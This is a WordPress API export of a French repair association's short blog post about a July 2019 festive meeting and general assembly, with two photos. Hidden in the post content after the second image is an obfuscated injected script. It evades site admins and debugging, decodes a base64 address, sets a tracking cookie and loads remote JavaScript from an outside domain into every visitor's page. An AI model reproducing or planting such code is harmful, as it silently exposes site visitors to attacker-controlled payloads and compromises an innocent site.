{"id":374,"date":"2019-07-05T11:03:41","date_gmt":"2019-07-05T09:03:41","guid":{"rendered":"http:\/\/reparenjalles.saintmedardasso.fr\/?p=374"},"modified":"2026-02-17T15:54:52","modified_gmt":"2026-02-17T14:54:52","slug":"moment-festif-et-assemblee-generale","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=374","title":{"rendered":"Moment Festif et Assembl\u00e9e G\u00e9n\u00e9rale"},"content":{"rendered":"<p>Les adh\u00e9rents de R\u00e9par&rsquo;en Jalles se sont r\u00e9unis le 02 juillet 2019 pour un moment festif<\/p>\n<p><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_8973_.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-375\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_8973_.jpg\" alt=\"\" width=\"816\" height=\"612\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_8973_.jpg 816w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_8973_-300x225.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_8973_-768x576.jpg 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/a><\/p>\n<p>et\u00a0 pour l&rsquo;Assembl\u00e9e G\u00e9n\u00e9rale<\/p>\n<p><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_E8977_.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-376\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_E8977_.jpg\" alt=\"\" width=\"816\" height=\"612\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_E8977_.jpg 816w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_E8977_-300x225.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2019\/07\/IMG_E8977_-768x576.jpg 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/a><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Les adh\u00e9rents de R\u00e9par&rsquo;en Jalles se sont r\u00e9unis le 02 juillet 2019 pour un moment festif et\u00a0 pour l&rsquo;Assembl\u00e9e G\u00e9n\u00e9rale<\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-374","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/374","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=374"}],"version-history":[{"count":1,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/374\/revisions"}],"predecessor-version":[{"id":2064,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/374\/revisions\/2064"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=374"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=374"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=374"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}